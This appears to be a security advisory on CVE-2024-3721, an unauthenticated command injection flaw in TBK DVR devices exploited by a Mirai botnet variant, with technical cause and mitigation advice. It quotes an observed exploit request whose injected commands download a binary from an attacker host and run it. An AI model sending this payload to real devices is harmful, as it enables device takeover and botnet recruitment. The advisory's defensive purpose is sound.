CVE-2024-3721: Mirai Botnet Exploits TBK DVR Vulnerability

A newly discovered vulnerability in TBK DVR systems—CVE-2024-3721—is being actively exploited in the wild by a fresh variant of the Mirai botnet. Though scored as medium severity (CVSS 6.3), its real-world impact is far greater due to the combination of unauthenticated access, command injection, and global exposure of thousands of devices.

The Vulnerability

CVE-2024-3721 affects TBK DVR-4104 and DVR-4216 devices running firmware up to April 12, 2024. The flaw lies in the /device.rsp API endpoint, which mishandles input in the mdb and mdc parameters when the command ___S_O_S_T_R_E_A_MAX___ is issued. These fields are not properly sanitized, allowing attackers to inject arbitrary shell commands.

This leads to remote command execution on the underlying operating system without requiring any authentication.

Here’s an example of a malicious request observed in the wild:

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /tmp; rm arm7; wget http://<malicious-ip>/arm7; chmod 777 *; ./arm7 tbk

The injected payload downloads and executes a malicious binary that turns the device into a botnet node.

Active Exploitation by Mirai Variant

Soon after disclosure, researchers at Kaspersky’s Global Research and Analysis Team (GReAT) observed the vulnerability being used to spread a new Mirai-based malware variant. This version targets ARM-based devices and uses encrypted payloads and anti-emulation techniques to avoid detection.

Once infected, compromised DVRs are enrolled into a distributed denial-of-service (DDoS) network controlled via remote command and control infrastructure. In some cases, the malware also deploys additional persistence mechanisms and obfuscation layers.

More than 50,000 vulnerable DVR devices have been identified on the internet, most of them in China, India, Egypt, Turkey, Ukraine, and Brazil.

Technical Analysis

The vulnerability stems from insecure string concatenation used when constructing shell commands on the DVR. Rather than sanitizing input or using safe APIs, the firmware embeds user-controlled input directly into system-level calls. No access controls are applied, making the attack vector accessible over any exposed network interface.

Security appliances from vendors like Check Point have already released detection signatures (e.g., CPAI-2024-0254) for this exploit. However, many devices remain unpatched and fully exposed.

Mitigation and Response

Device owners should immediately check for firmware updates from TBK and apply them. If no patch is available, systems should be taken offline or placed behind strict network controls.

  • Block external access to /device.rsp endpoints using network firewall rules.
  • Segment DVR devices onto isolated VLANs.
  • Monitor HTTP traffic for suspicious POST requests containing mdb or mdc fields with shell-like content.
  • Deploy intrusion detection systems with updated rulesets to catch exploit attempts.

Organizations with visibility over customer networks (e.g., MSSPs or ISPs) should consider issuing proactive alerts or quarantining infected endpoints.

Implications

This vulnerability is a stark reminder of the risks posed by unmanaged or poorly secured IoT devices. While the vulnerability itself is relatively straightforward, its exploitation highlights how quickly attackers can weaponize even low-profile flaws in widely distributed embedded systems.

In many cases, DVRs and surveillance devices remain operational in production networks for years, often with outdated firmware, weak credentials, and full internet exposure. Combined, these conditions make them attractive targets for malware propagation and botnet operations.

Final Thoughts

CVE-2024-3721 may not have made front-page headlines, but its impact is being felt across global botnet infrastructures. It reinforces the importance of applying least privilege principles, network segmentation, and timely firmware management—especially for IoT-class devices that often fly under the radar.

The return of Mirai in this context is no surprise. The infrastructure may be old, but the techniques are evolving. And until device security becomes a universal standard, opportunistic exploitation will remain inevitable.